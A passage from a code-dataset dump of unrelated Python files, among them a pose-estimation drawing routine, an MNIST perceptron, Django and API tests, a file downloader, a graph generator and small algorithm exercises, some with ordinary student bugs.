cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n # Line:左股関節 → 左ひざ\n index01, index02 = 11, 13\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n # Line:左ひざ → 左足首\n index01, index02 = 13, 15\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n # Line:右肩 → 右股関節\n index01, index02 = 6, 12\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n # Line:右股関節 → 右ひざ\n index01, index02 = 12, 14\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n # Line:右ひざ → 右足首\n index01, index02 = 14, 16\n if scores[index01] > keypoint_score_th and scores[\n index02] > keypoint_score_th:\n point01 = keypoints[index01]\n point02 = keypoints[index02]\n cv.line(debug_image, point01, point02, (255, 255, 255), 4)\n cv.line(debug_image, point01, point02, (0, 0, 0), 2)\n\n # Circle:各点\n for keypoint, score in zip(keypoints, scores):\n if score > keypoint_score_th:\n cv.circle(debug_image, keypoint, 6, (255, 255, 255), -1)\n cv.circle(debug_image, keypoint, 3, (0, 0, 0), -1)\n\n # 処理時間\n cv.putText(debug_image,\n \"Elapsed Time : \" + '{:.1f}'.format(elapsed_time * 1000) + \"ms\",\n (10, 30), cv.FONT_HERSHEY_SIMPLEX, 0.7, (255, 255, 255), 4,\n cv.LINE_AA)\n cv.putText(debug_image,\n \"Elapsed Time : \" + '{:.1f}'.format(elapsed_time * 1000) + \"ms\",\n (10, 30), cv.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0), 2,\n cv.LINE_AA)\n\n return debug_image\n\n\nif __name__ == '__main__':\n main()","sub_path":"demo_singlepose_tflite.py","file_name":"demo_singlepose_tflite.py","file_ext":"py","file_size_in_byte":12192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"547048763","text":"\"\"\"\nSuppose you have a random list of people standing in a queue.\nEach person is described by a pair of integers (h, k), where h is the height of the person and k is the number of people\nin front of this person who have a height greater than or equal to h. Write an algorithm to reconstruct the queue.\nNote:\nThe number of people is less than 1,100.\n\nExample\n\nInput:\n[[7,0], [4,4], [7,1], [5,0], [6,1], [5,2]]\n\nOutput:\n[[5,0], [7,0], [5,2], [6,1], [4,4], [7,1]]\n\"\"\"\npeople = [[5,0], [6,1], [7,0], [4,4], [7,1], [5,2]]\ndef reconstructQueue(people):\n res = []\n for p in sorted((-x[0], x[1]) for x in people):\n res.insert(p[1], [-p[0], p[1]])\n return res\n\n\"\"\"\nExplanation and solution from @SergeyTachenov:\nImagine you only had the tallest people. Then the you would sort them based on the second index,\nsince they only see themselves and themselves only. e.g. [[7, 0], [7, 1], ... ]\nThen the next tallest group, and the second index would indicate exactly where they should be.\nand so on and on.\nThe second part was confusing at first, but playing with it and writing it down on paper made it easier to understand.\n\n\"\"\"","sub_path":"406.py","file_name":"406.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"123793197","text":"#create a perceptron!\n\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nclass Perceptron:\n #constructor here\n def __init__(self, input_size, learning_rate, my_label):#first parameter of any class method is self\n self.input_size = input_size\n self.learning_rate = learning_rate\n self.my_label = my_label\n #create rand weight values matrix\n self.weight_vector = np.random.uniform(low=(-.05), high=.05, size=(input_size+1,))\n\n def train(self, input_vector, target):\n # insert bias (input, indice, valueinserted,axis-optional\n input_vector = np.insert(input_vector, 0, 1, axis=0)\n #compute\n sum_value = 0\n if (np.dot(self.weight_vector, input_vector) > 0):\n #update weight vector\n sum_value = 1\n #compare to target\n if(sum_value != target):\n #update weights taking in target and value \n #with inline anonymous function\n update_funct = lambda w, x_in: w + x_in*(self.learning_rate * (target - sum_value))\n #update a single weight\n vector_function = np.vectorize(update_funct)#can take in lambda or function\n #does the vector function on the entire vector\n self.weight_vector = vector_function(self.weight_vector, input_vector)\n\n def test(self, input_vector):\n #insert bias\n input_vector = np.insert(input_vector, 0, 1, axis=0)\n return np.dot(self.weight_vector, input_vector)\n\n\nclass TrainClassifier:\n def __init__(self, input_size, learning_rate, num_classes):\n self.perceptron_list = []\n for index in range(num_classes):\n #create labels using index\n self.perceptron_list.append(Perceptron(input_size, learning_rate, index))\n\n def train_classifier_vector(self, input_vector, label):\n #is it labeled correctly\n for perceptron in self.perceptron_list:\n #compute target\n target = 1 if label == perceptron.my_label else 0\n perceptron.train(input_vector, target)\n\n\n def train_classifier_dataset(self, input_matrix, label_vector):\n #shuffle list\n zipped_data = list(zip(input_matrix,label_vector))\n np.random.shuffle(zipped_data)\n #for each row\n for input_vector,label in zipped_data:\n self.train_classifier_vector(input_vector, label)\n\n #return a predicted label\n def classify_vector(self, input_vector):\n #list comprehension--\n predictions = [(perceptron.test(input_vector),perceptron.my_label) for perceptron in self.perceptron_list]\n print(predictions)\n\n# def test_classifier_dataset(\n\n#read data\n#split in to labels and input_matrix \n#give to train_classifier\n\n#python for main method:\nif __name__ == \"__main__\":\n\n # Create matrices of data\n train_data = pd.read_csv(\"data/mnist_train.csv\", header=None).values\n test_data = pd.read_csv(\"data/mnist_test.csv\", header=None).values\n\n# transpose_train = train_data.transpose()\n# print(transpose_train)\n\n train_labels = train_data[:,0]\n test_labels = test_data[:,0]\n\n train_data = np.delete(train_data, 0, axis=1)\n test_data = np.delete(test_data, 0, axis=1)\n\n train_classifier = TrainClassifier(784, .01, 10)\n\n train_classifier.train_classifier_dataset(train_data, train_labels)\n\n\n\n\n","sub_path":"digit_classifier_NN.py","file_name":"digit_classifier_NN.py","file_ext":"py","file_size_in_byte":3386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"319029982","text":"from django.test import TestCase\nfrom catalog.models import Mineral\n\n\nclass MineralModelTests(TestCase):\n \"\"\"Test the Mineral model.\"\"\"\n def setUp(self):\n Mineral.objects.create(\n name=\"Axinite\",\n image_filename=\"Axinite.jpg\",\n streak=\"White to greyish white\",\n group='Silicates'\n )\n Mineral.objects.create(\n name=\"Barstowite\",\n image_filename=\"Barstowite.jpg\",\n streak=\"White to brownish\",\n group='Organic Minerals'\n )\n\n def test_mineral_name(self):\n \"\"\"Test mineral name is set correctly\"\"\"\n axinite = Mineral.objects.get(name='Axinite')\n barstowite = Mineral.objects.get(name='Barstowite')\n self.assertEqual(str(axinite), 'Axinite')\n self.assertEqual(str(barstowite), 'Barstowite')\n\n def test_mineral_group(self):\n \"\"\"Test mineral group is set correctly\"\"\"\n axinite = Mineral.objects.get(name='Axinite')\n barstowite = Mineral.objects.get(name='Barstowite')\n self.assertEqual(axinite.group, 'Silicates')\n self.assertEqual(barstowite.group, 'Organic Minerals')","sub_path":"catalog/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"177392066","text":"import happybase\r\nimport pandas as pd\r\n\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.animation import FuncAnimation\r\n\r\nimport numpy as np\r\nimport matplotlib.units as munits\r\nimport matplotlib.dates as mdates\r\n\r\nimport datetime\r\nfrom matplotlib.dates import DateFormatter\r\n# converter = mdates.ConciseDateConverter()\r\n# munits.registry[np.datetime64] = converter\r\n# munits.registry[datetime.date] = converter\r\n# munits.registry[datetime.datetime] = converter\r\n\r\n\r\ndef connect(tname):\r\n CONNECTION = happybase.Connection('104.154.17.226', 9090)\r\n CONNECTION.open()\r\n # print(CONNECTION.tables())\r\n\r\n _table = CONNECTION.table(tname)\r\n print(_table)\r\n return _table\r\n\r\n\r\ntable = connect('pilot')\r\n\r\nxs = []\r\nys = []\r\n\r\n\r\n# for (key, data) in table.scan(limit=10):\r\n# print(key, data)\r\n\r\n# d = [(a, b, c) for a, (b, c) in l]\r\ndf = pd.DataFrame(table.scan(), columns=['date','countries'])\r\ndd = df.countries.apply(pd.Series)\r\n# print(\"aaa\", dd)\r\n\r\nmetas = pd.DataFrame({'col':[\r\n b'country:US', \r\n b'country:CN',\r\n b'country:JP',\r\n b'country:UK',\r\n b'country:KR',\r\n ], \r\n 'title':['US', 'CN', 'JP', 'UK', 'KR'] } )\r\n\r\ndf2 = pd.concat(\r\n [\r\n df.drop(['countries'], axis=1),\r\n df.countries.apply(pd.Series)\r\n ], axis=1)\r\n\r\nprint(df2)\r\n\r\ndef test():\r\n df[\"date\"] = pd.to_datetime(df[\"date\"].str.decode(\"utf-8\"))\r\n print(df)\r\n\r\n\r\n# # for i in metas.columns[1:]:\r\n# # for name, values in df.iteritems():\r\n\r\ndef plot():\r\n plt.style.use('fivethirtyeight')\r\n\r\n fig, ax = plt.subplots()\r\n\r\n # ax.xaxis.set_major_formatter(DateFormatter('%m-%d'))\r\n\r\n # lims = [(np.datetime64('2005-02'), np.datetime64('2005-04')),\r\n # (np.datetime64('2005-02-03'), np.datetime64('2005-02-15')),\r\n # (np.datetime64('2005-02-03 11:00'), np.datetime64('2005-02-04 13:20'))]\r\n\r\n\r\n # locator = mdates.AutoDateLocator(minticks=3, maxticks=7)\r\n # xfmt = mdates.DateFormatter('%Y-%m-%d')\r\n # ax.xaxis.set_major_formatter(xfmt)\r\n # ax.xaxis.set_major_locator(locator)\r\n # formatter = mdates.ConcseDateFormatter(locator)\r\n # ax.xaxis.set_major_formatter(formatter)\r\n # for i in \r\n # print(type(metas.col))\r\n for (index, row) in metas.iterrows():\r\n colName = row['col']\r\n # print(row['col'], row['id'])\r\n if colName in df2:\r\n print(colName)\r\n # print(df2[colName])\r\n # plt.plot(df2['date'].apply(lambda x:x[4:6]+b'/'+x[6:8]) , df2[colName].fillna(\"0\"), label=row['title'])\r\n # print(\"----\", colName)\r\n # print( df2['date'], df2[colName].apply(lambda x:), row['title'])\r\n # ax.plot(b'date', b'country:CN', data=df2)\r\n cases = df2[colName].str.decode(\"utf-8\").fillna(\"0\").apply(lambda x: int(x))\r\n debug(cases)\r\n cases = np.cumsum(cases)\r\n debug(cases)\r\n # print(cases)\r\n # for i in cases:\r\n # print(type(i))\r\n # int.from_bytes(b'y\\xcc\\xa6\\xbb', byteorder='big')\r\n dates = pd.to_datetime(df2['date'].str.decode(\"utf-8\"))\r\n # dates = [datetime.datetime.strptime(d, '%Y-%m-%d') for d in dates]\r\n \r\n # int.from_bytes(b'y\\xcc\\xa6\\xbb', byteorder='big')\r\n ax.plot(dates, cases , label=row['title'] )\r\n \r\n # break\r\n\r\n\r\n plt.legend(loc='upper left')\r\n plt.tight_layout()\r\n plt.show()\r\n\r\n# for column in metas:\r\n# print(metas[column])\r\n # for i in metas[column]\r\n # print(i)\r\n\r\n# for name, values in metas.iteritems():\r\n# print('{name}: {value}'.format(name=name, value=values))\r\n\r\n\r\n\r\n\r\ndef debug(col):\r\n print(col)\r\n for i in col:\r\n print(i)\r\n\r\n# for p in meta.index\r\n\r\n# plt.legend(loc='upper left')\r\n# plt.tight_layout()\r\n\r\n\r\nplot()","sub_path":"proj/plot/test copy.py","file_name":"test copy.py","file_ext":"py","file_size_in_byte":3971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"23672616","text":"#!/usr/bin/python\n\n# Collect the cds seq of high quality for each OG group\n\nfrom Bio import SeqIO\nimport os\nimport argparse\n\n'''\nprosource1 = '/home/luhongzhong/protein_all_align_s2_R/'\ncdssource2 = '/home/luhongzhong/cds_all/'\noutputfile = '/home/luhongzhong/cds_all_refine/'\n\nfile1 = prosource1 + 'OG5327_aa_aligned.fasta'\nfile2 = cdssource2 + 'OG5327_code.fasta'\nfile3 = outputfile + 'OG5327_code.fasta'\n'''\n\ndef filterCDS(cds_input, OG_input, cds_output):\n cds = list(SeqIO.parse(cds_input, \"fasta\"))\n try:\n OG_trim = list(SeqIO.parse(OG_input, \"fasta\"))\n proteinID = []\n for record in OG_trim:\n print(record.id, len(list(record.seq)))\n proteinID.append(record.id)\n cds_new = []\n for cds0 in cds:\n print(cds0.id)\n if cds0.id in proteinID:\n cds_new.append(cds0)\n SeqIO.write(cds_new, cds_output, \"fasta\")\n except:\n pass\n print(\"No refined OG could be found!\")\n\n\n\n# for the batch process\n# the code file is stored in the document file\ndef main():\n parser = argparse.ArgumentParser(\n formatter_class = argparse.RawDescriptionHelpFormatter,\n description = 'Collect the cds seq of high quality for each OG group')\n #adding arguments\n parser.add_argument('-n', metavar='input_file', type=str, help='input the cds seq before trim')\n parser.add_argument('-p1', metavar = 'input_file', type = str, help = 'input the protein seq after trim')\n parser.add_argument('-o', metavar = 'output_file', type = str, help = 'output file to store the new protein seq')\n #parser.add_argument('-o', metavar='output_file', type=str, help='output file to store the result')\n\n args = parser.parse_args()\n cdsfile = args.n\n profile = args.p1 # store the cds in phy format\n outfile = args.o # store the code\n # for the test\n cds_list = os.listdir(cdsfile)\n for ele in cds_list:\n print(ele)\n cds0 = cdsfile + ele\n if \"code\" in ele: # this is for 343 yeast species genome annotation\n pro0 = profile + ele.replace(\"code\", \"aa_aligned\") # for non-pruned protein fasta file\n #pro0 = profile + ele.replace(\"_code.fasta\", \"_aa_aligned.fasta_pruned.fa\") # for pruned fasta file\n else: # this is for 1011 sce genomes annotation\n pro0 = profile + ele.replace(\".fasta\", \"_aa_aligned.fasta\")\n output0 = outfile + ele\n try:\n filterCDS(cds_input=cds0, OG_input=pro0, cds_output=output0)\n except: pass\nif __name__ == \"__main__\":\n main()\n\n# an example\n# python os.mkdir(\"/home/luhongzhong/cds_all_refine/\")\n# python A2_extract_cds_from_align_protein.py -n /home/luhongzhong/cds_all/ -p1 /home/luhongzhong/protein_all_align_s2_R/ -o /home/luhongzhong/cds_all_refine/","sub_path":"evolution_analysis/code/code_align/A2_extract_cds_from_align_protein.py","file_name":"A2_extract_cds_from_align_protein.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"640061958","text":"\"\"\"\nTime:2019/11/6 0006\n\"\"\"\nimport unittest\n\nfrom libs.ddt import ddt, data\n\nfrom scripts.handle_excel import HandleExcel\nfrom scripts.handle_log import lt\nfrom scripts.handle_conf import uy\nfrom scripts.handle_mysql import HandleMysql\nfrom scripts.handle_re import HandleRe\nfrom scripts.handle_requests import HandleRequests\n\n\n@ddt\nclass TestAdd(unittest.TestCase):\n eo = HandleExcel('add')\n cases = eo.read_excel()\n\n @classmethod\n def setUpClass(cls):\n cls.hm = HandleMysql()\n cls.hr = HandleRequests()\n cls.hr.common_heads({'X-Lemonban-Media-Type': 'lemonban.v2'})\n\n @data(*cases)\n def test_excel_case(self, obj):\n # 构造url\n register_url = ''.join((uy.open_yaml('api', 'load'), obj.url))\n # 获取请求参数\n data_num = HandleRe.str_regex(obj.data)\n # 发起请求\n res = self.hr.send(url=register_url, data=data_num)\n # 相应内容转换为json格式\n res_data = res.json()\n # Authorization\n if obj.caseId == 2:\n self.hr.one_session.headers.update({'Authorization':'Bearer ' + res_data['data']['token_info']['token']})\n\n try:\n # 多条信息进行断言\n self.assertListEqual([res_data.get('code'), res_data.get('msg')], [obj.expected, obj.msg], msg=f'用例{obj.title}已执行')\n except AssertionError as e:\n self.eo.write_excel(int(obj.caseId) + 1, uy.open_yaml('excel', 'result_col'),\n uy.open_yaml('excel', 'failed'))\n self.eo.write_excel(int(obj.caseId) + 1, uy.open_yaml('excel', 'response_col'), res.text)\n lt.error(e)\n raise e\n else:\n self.eo.write_excel(int(obj.caseId) + 1, uy.open_yaml('excel', 'result_col'),\n uy.open_yaml('excel', 'expected'))\n self.eo.write_excel(int(obj.caseId) + 1, uy.open_yaml('excel', 'response_col'), res.text)\n lt.info(obj.title)\n\n @classmethod\n def tearDownClass(cls):\n cls.hm.close()\n cls.hr.close()\n\nif __name__ == '__main__':\n unittest.main()\n\n\n","sub_path":"cases/test_04_add.py","file_name":"test_04_add.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"403726814","text":"# -*- coding: utf-8 -*-\r\n'''Tp10 : Piles et files.\r\n##############\r\nObjectifs :\r\n-----------\r\n #. Manipulation des files.\r\n #. Manipulation des Piles.\r\n'''\r\n\r\n__author__ = 'A. MHAMEDI'\r\n__version__ = '0.1'\r\n\r\n\r\ndef premier_file(file: object) -> object:\r\n '''Retourne le premier element d'une file (FIFO).\r\n\r\n Parameters\r\n ----------\r\n file : File\r\n une file initialisée.\r\n Returns\r\n -------\r\n premier : object\r\n premier élément de la file.\r\n See Also\r\n --------\r\n File.tete()\r\n Notes\r\n -----\r\n on peut créer une version avec une file de type list ou Queue.\r\n '''\r\n premier = file.defiler() # FIFO\r\n return premier\r\n\r\n\r\nif __name__ == '__main__':\r\n import doctest as dt\r\n dt.testmod()\r\n\r\n # from tp11.sdtc import File\r\n from tp11.sdt import File\r\n # Instanciation\r\n file = File()\r\n # pile = Pile()\r\n # Initialisation\r\n for x in range(1, 20, 3):\r\n file.enfiler(x)\r\n # Utilisation\r\n print(premier_file(file))\r\n","sub_path":"tp11/tp10.py","file_name":"tp10.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"486772281","text":"from django.core.management import call_command\nfrom django.test import TestCase, Client\nfrom django.conf import settings\n\n\nclass TestViews(TestCase):\n def setUp(self):\n args = []\n opts = {'dumpfile': settings.MEDIA_ROOT + 'test_db_dump.xml', 'verbosity': 0}\n cmd = 'migrate_db'\n call_command(cmd, *args, **opts)\n\n self.client = Client()\n\n def test_index(self):\n response = self.client.get('/share_data_gbif/')\n self.assertEqual(200, response.status_code)\n\n def test_dump_data_error(self):\n response = self.client.get('/share_data_gbif/dump_data/')\n result = response.content.decode('utf-8')\n expected = '{\"result\": \"error\"}'\n self.assertEqual(expected, result)\n\n def test_dump_data_count_data(self):\n response = self.client.get('/share_data_gbif/dump_data/',\n {'request': 'count_data'})\n result = response.content.decode('utf-8')\n expected = '\"count\": 10'\n self.assertTrue(expected in result)\n\n def test_dump_data_make_file(self):\n response = self.client.get('/share_data_gbif/dump_data/',\n {'request': 'make_file'})\n result = response.content.decode('utf-8')\n expected = 'CP100-15,,,Nymphalidae,,Melitaeini,Melitaeina'\n self.assertTrue(expected in result)\n","sub_path":"gbif/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"641439533","text":"import requests\nimport os\nfrom lxml.etree import ElementTree, HTMLParser\nimport io\n\n\ndef download_to(path, url_to_download_from):\n # download chosen file from the url to the path\n # folder in format \"./folder1/folder2/final_folder/\"\n # url in format: \"https://doc.lagout.org/science/0_Computer%20Science/2_Algorithms/Genetic%20Programming.pdf\"\n file_name, file_format = get_file_name_and_format(url_to_download_from)\n response_object = requests.get(url_to_download_from)\n\n if path[-1] != \"/\":\n path.append(\"/\")\n\n if not os.path.exists(path):\n os.makedirs(path)\n\n with open(path + file_name + \".\" + file_format, \"wb\") as file:\n file.write(response_object.content)\n file.close()\n return print(\"download: \", file_name + \".\" + file_format)\n\n\ndef get_file_name_and_format(file_url):\n file_name_and_format = file_url.split(\"/\")[-1]\n splitted_by_dot = file_name_and_format.split(\".\")\n file_name, file_format = \"\".join(splitted_by_dot[:-1]), splitted_by_dot[-1]\n return file_name, file_format\n\n\ndef download_all_to(path, url):\n # download all files from the url and save to the path\n response_object = requests.get(url)\n url_file_list = lxml_get_files(response_object)\n\n if path[-1] != \"/\":\n path.append(\"/\")\n\n if not os.path.exists(path):\n os.makedirs(path)\n\n if not url.endswith(\"/\"):\n url.append(\"/\")\n\n for file in url_file_list:\n download_to(path, url + file)\n\ndef lxml_get_files(page_response):\n tree = ElementTree(file=io.BytesIO(page_response.content), parser=HTMLParser()).getroot()\n all_a_elements = tree.cssselect('pre a')\n dir_and_files_list = [i.get(\"href\") for i in all_a_elements]\n\n file_list = [i for i in dir_and_files_list if not i.endswith(\"/\")]\n return file_list\n\n\nif __name__ == '__main__':\n dir = \"./foo/\"\n url = \"https://doc.lagout.org/science/0_Computer%20Science/2_Algorithms/Genetic%20Programming.pdf\"\n # download_to(dir, url)\n folder_url = \"https://doc.lagout.org/science/0_Computer%20Science/2_Algorithms/\"\n download_all_to(dir, folder_url)","sub_path":"common-data/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"491920107","text":"import time\n\ndef main():\n # Find the first 45 Fibonacci numbers\n INDEX = 47\n numbers = INDEX * [0]\n numbers[0] = 0\n numbers[1] = 1\n for i in range(2, INDEX):\n numbers[i] = numbers[i - 1] + numbers[i - 2]\n\n print(\"\\t\\t\\t40\\t41\\t42\\t43\\t44\\t45\")\n print(\"-------------------------------------------------------------\");\n print(\"Listing 16.2 GCD1\")\n\n executionTime = 6 * [0]\n\n for i in range(40, 45 + 1):\n startTime = time.time()\n gcd1(numbers[i], numbers[i + 1])\n executionTime[i - 40] = time.time() - startTime\n\n for i in range(5 + 1):\n print(\"\\t\" + str(executionTime[i]))\n\n print(\"\\nListing 16.3 GCD2\");\n\n for i in range(40, 45 + 1):\n startTime = System.currentTimeMillis()\n gcd2(numbers[i], numbers[i + 1])\n executionTime[i - 40] = time.time() - startTime\n\n for i in range(0, 5 + 1):\n print(\"\\t\" + str(executionTime[i]))\n\n# Find gcd for integers m and n \ndef gcd1(m, n):\n gcd = 1\n \n if m % n == 0:\n return n\n \n for k in range(int(n / 2), 0, -1):\n if m % k == 0 and n % k == 0:\n gcd = k\n break\n \n return gcd\n\n# Find gcd for integers m and n \ndef gcd2(m, n):\n if m % n == 0:\n return n\n else:\n return gcd(n, m % n)\n \nmain()","sub_path":"evennumberedexercise/Exercise16_6.py","file_name":"Exercise16_6.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"179171900","text":"import random\nimport os\nimport datetime\nimport sys\nimport yaml\nimport json\nimport pickle\n\nSource_dir=os.getcwd()\n#random_system=random.SystemRandom()\nrandom_system=random\n\ndef convert_bytes(num):\n \"\"\"\n convert num to idiomatic byte unit\n :param num: the input number.\n :type num:int\n :return: str\n \"\"\"\n for x in ['bytes', 'KB', 'MB', 'GB', 'TB']:\n if num < 1024.0:\n return \"%3.1f %s\" % (num, x)\n num /= 1024.0\ndef filesize(fileaddr):\n '''\n This function calculate output file size\n :param fileaddr: file addresses\n :type fileaddr:str\n :return: file size for print as string\n '''\n file_info=os.stat(fileaddr)\n file_size= file_info.st_size\n print(\"Graph File Size : \"+convert_bytes(file_size))\n\ndef logger(vertices_number,edge_number,file_name,elapsed_time):\n '''\n This function save generated graphs log\n :param vertices_number: nubmer of vertices\n :type vertices_number:int\n :param edge_number: Number of edges\n :type edge_number:int;\n :param file_name: File Name\n :type file_name:str\n :param elapsed_time: Elapsed Time\n :type elapsed_time : str\n :return: None\n '''\n try:\n file = open(\"logfile.log\", \"a\")\n file.write(str(datetime.datetime.now())+\"\\n\")\n file.write(\"Filename : \"+file_name+\"\\n\")\n file.write(\"Vertices : \"+str(vertices_number)+\"\\n\")\n file.write(\"Edges : \"+str(edge_number)+\"\\n\")\n file.write(\"Elapsed Time : \" + str(elapsed_time) + \"\\n\")\n file.write(\"-------------------------------\\n\")\n file.close()\n except Exception:\n print(\"[Error] Logger Faild!\")\n\ndef zero_insert(input_string):\n '''\n This function get a string as input if input is one digit add a zero\n :param input_string: input digit az string\n :type input_string:str\n :return: modified output as str\n >>> zero_insert(\"22\")\n >>> '22'\n '''\n if len(input_string)==1:\n return \"0\"+input_string\n return input_string\n\ndef time_convert(input_string):\n '''\n This function convert input_string from sec to DD,HH,MM,SS Format\n :param input_string: input time string in sec\n :type input_string:str\n :return: converted time as string\n '''\n input_sec=float(input_string)\n input_minute=input_sec//60\n input_sec=int(input_sec-input_minute*60)\n input_hour=input_minute//60\n input_minute=int(input_minute-input_hour*60)\n input_day=int(input_hour//24)\n input_hour=int(input_hour-input_day*24)\n return zero_insert(str(input_day))+\" days, \"+zero_insert(str(input_hour))+\" hour, \"+zero_insert(str(input_minute))+\" minutes, \"+zero_insert(str(input_sec))+\" seconds\"\n\n\ndef get_input(input_func=input):\n '''\n This function get input from user and return as dictionary\n :return: inputs as dictionary\n '''\n try:\n file_name=input_func(\"File Name : \")\n if file_name+\".gr\" in os.listdir():\n raise Exception(\"There is file with this name\")\n vertices=int(input_func(\"Vertices Number : \"))\n max_weight=int(input_func(\"Max Weight : \"))\n min_weight = int(input_func(\"Min Weight : \"))\n min_edge=int(input_func(\"Min Edge Number :\"))\n min_edge=max(0,min_edge)\n max_edge=int(input_func(\"Max Edge Number :\"))\n max_edge=min(max_edge,vertices)\n sign_flag=int(input_func(\"Signed[1] or Unsigned[2]\"))\n output_format=int(input_func(\"Graph Format : \\nDIMACS(.gr)[1] | JSON(.json)[2] | CSV(.csv)[3] | YAML(.yaml)[4]\\n| WEL(.wel)[5] | ASP(.lp)[6] | Pickle(.p)[7] | UCINET DL Format(.dl)[8] | TGF(.tgf)[9]\"))\n if sign_flag not in [1,2]:\n sign_flag=2\n if output_format not in list(range(1,10)):\n output_format=1\n return {\"file_name\":file_name,\"vertices\":vertices,\"max_weight\":max_weight,\"min_weight\":min_weight,\"min_edge\":min_edge,\"max_edge\":max_edge,\"sign\":sign_flag,\"output_format\":output_format}\n except Exception:\n print(\"[Error] Bad Input!\")\n sys.exit()\n\ndef sign_gen():\n '''\n This function return random sign\n :return: 1 or -1\n '''\n flag=random_system.randint(0,1)\n if flag==0:\n return 1\n else:\n return -1\ndef branch_gen(random_edge,vertices_number,min_range,max_range,sign):\n '''\n This function generate branch and weight vector of each vertex\n :param random_edge: number of vertex edges\n :type random_edge:int\n :param vertices_number: number of vertices\n :type vertices_number:int\n :param min_range: weight min range\n :type min_range:int\n :param max_range: weight max range\n :type max_range:int\n :return: branch and weight list\n '''\n index = 0\n branch_list = []\n weight_list=[]\n while (index < random_edge):\n random_tail = random_system.randint(1, vertices_number + 1)\n if sign==2:\n random_weight=random_system.randint(min_range,max_range)\n else:\n random_weight = sign_gen() * random_system.randint(min_range, max_range)\n if random_tail not in branch_list:\n branch_list.append(random_tail)\n weight_list.append(random_weight)\n index += 1\n return [branch_list,weight_list]\ndef edge_gen(vertices_number,min_range,max_range,min_edge,max_edge,sign):\n '''\n This function generate each vertex connection number\n :param vertices_number: number of vertices\n :type vertices_number:int\n :param min_range: weight min_range\n :type min_range:int\n :param max_range: weight max_range\n :type max_range:int\n :return: list of 2 dictionary\n '''\n temp=0\n vertices_id=list(range(1,vertices_number+1))\n vertices_edge=[]\n weight_list=[]\n i=0\n while(i ListNode:\r\n if not lists:\r\n return None\r\n counter = itertools.count()\r\n pq = []\r\n head = cur = ListNode(0)\r\n for i in lists:\r\n if i:\r\n count = next(counter)\r\n heapq.heappush(pq, (i.val, count, i))\r\n while pq:\r\n val, _, node = heapq.heappop(pq)\r\n new = ListNode(val)\r\n cur.next = new\r\n cur = cur.next\r\n node = node.next\r\n count = next(counter)\r\n if node:\r\n heapq.heappush(pq, (node.val, count, node))\r\n return head.next","sub_path":"codes/AndrewSun/0023.py","file_name":"0023.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"581491786","text":"from .errors import PureModule; PureModule\nfrom itertools import chain\n\n_ALPHA = tuple(map(chr, range(ord('a'), ord('z') + 1)))\n\ndef aaa(n):\n r'''\n aaa(0) == 'a', 'b',..., 'z'\n aaa(1) == 'aa', 'ab',...'az', 'ba', 'bb',..., 'zz'\n aaa(2) == 'aaa', 'aab',...'aaz', 'aba', 'abb',..., 'zzz'\n '''\n if n == 0:\n return _ALPHA\n return (l + r for l in _ALPHA for r in aaa(n - 1))\n\ndef aaaa(n):\n '''chain(aaa(0), aaa(1), aaa(2),..., aaa(n - 1)) == (aaaa(n))'''\n return chain(*(aaa(i) for i in range(n)))\n# aaaa = lambda n: chain(*(aaa(i) for i in range(n)))\n","sub_path":"x19290/aaa.py","file_name":"aaa.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"238083542","text":"class Solution(object):\n def matrixReshape(self, nums, r, c):\n if len(nums) * len(nums[0]) != r * c:\n return nums\n res, sub = [], []\n for row in nums:\n for num in row:\n sub.append(num)\n if len(sub) == c:\n res.append(sub)\n sub = []\n return 